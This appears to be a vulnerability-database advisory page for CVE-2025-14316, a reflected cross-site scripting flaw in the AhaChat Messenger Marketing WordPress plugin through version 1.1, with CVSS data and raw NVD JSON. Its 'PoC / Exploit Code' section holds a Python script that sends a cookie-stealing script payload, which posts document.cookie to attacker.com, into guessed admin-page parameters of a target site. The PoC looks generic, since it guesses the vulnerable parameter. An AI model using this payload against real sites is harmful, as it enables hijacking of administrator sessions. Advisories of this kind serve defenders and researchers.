Security Vulnerability Report
中文
CVE-2025-14316 CVSS 7.1 HIGH

CVE-2025-14316

Published: 2026-01-26 07:16:06
Last Modified: 2026-04-15 00:35:42

Description

The AhaChat Messenger Marketing WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

AhaChat Messenger Marketing WordPress Plugin <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14316 PoC - AhaChat WordPress Plugin Reflected XSS # Target: WordPress site with AhaChat Messenger Marketing Plugin <= 1.1 def test_reflected_xss(target_url): """ Test for CVE-2025-14316: Reflected XSS in AhaChat Plugin Attack Vector: 1. Attacker crafts a URL with malicious XSS payload in vulnerable parameter 2. Victim visits the crafted URL while authenticated to WordPress 3. Malicious JavaScript executes in victim's browser Common vulnerable endpoint pattern: /wp-admin/admin.php?page=ahachat&param=<script>alert(document.cookie)</script> """ # XSS payload - cookie stealing xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Encode payload for URL encoded_payload = xss_payload.replace('<', '%3C').replace('>', '%3E') # Common vulnerable parameter names in WordPress plugins vulnerable_params = ['tab', 'view', 'action', 'page', 'id', 'key', 'ref'] for param in vulnerable_params: # Construct malicious URL malicious_url = f"{target_url}/wp-admin/admin.php?page=ahachat&{param}={encoded_payload}" print(f"[*] Testing parameter: {param}") print(f"[*] URL: {malicious_url}") try: response = requests.get(malicious_url, timeout=10) # Check if payload is reflected without encoding if encoded_payload.replace('%3C', '<').replace('%3E', '>') in response.text: print(f"[!] VULNERABLE! XSS payload reflected in response") print(f"[!] Parameter '{param}' is vulnerable to Reflected XSS") return True except requests.RequestException as e: print(f"[-] Error: {e}") print("[*] Testing complete. No reflected XSS detected with basic payloads.") return False # Usage example if __name__ == "__main__": # Replace with target URL target = "https://example-wordpress-site.com" test_reflected_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14316", "sourceIdentifier": "[email protected]", "published": "2026-01-26T07:16:06.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AhaChat Messenger Marketing WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin"}, {"lang": "es", "value": "El plugin de WordPress AhaChat Messenger Marketing hasta la 1.1 no sanitiza ni escapa un parámetro antes de mostrarlo de nuevo en la página, lo que lleva a un cross-site scripting reflejado que podría ser utilizado contra usuarios con altos privilegios, como el administrador."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/7d69ebec-f940-4491-a51e-70a9e1bf8a4c/", "source": "[email protected]"}]}}